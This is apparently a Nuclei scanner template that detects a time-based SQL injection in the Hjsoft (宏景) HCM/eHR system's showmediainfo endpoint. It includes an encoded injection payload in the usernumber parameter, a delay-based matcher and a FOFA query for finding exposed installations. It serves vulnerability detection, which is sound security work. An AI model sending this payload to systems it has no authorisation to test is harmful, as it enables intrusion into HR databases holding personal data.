id: hjsoft-showmediainfo-sqli

info:
  name: 宏景 HCM 系统 showmediainfo - SQL Injection
  author: leadlife
  severity: high
  description: Detects SQL Injection vulnerability in Hjsoft eHR showmediainfo.
  reference:
    https://github.com/wy876/POC/commit/eda99ffdb2dc52a9536b5c291722bbe5279fcfcb
  metadata:
    verified: true
    fofa-query: app="HJSOFT-HCM"
  tags: hjsoft,sqli,time

http:
  - raw:
      - |
        @timeout: 15s
        GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPVIRoUrFdir1XVNthrak35kPAATTP3HJDPAATTP&planid=1&objectid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration >= 5 && duration < 9
          - status_code == 200
        condition: and
